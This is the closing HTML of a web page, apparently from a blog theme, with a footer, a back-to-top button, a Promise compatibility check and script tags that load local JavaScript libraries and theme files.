



        







        
      </div>
    </footer>

    
      <div class="back-to-top">
        <i class="fa fa-arrow-up"></i>
        
      </div>
    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  

  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  

  
  

  

  

  

</body>
</html>
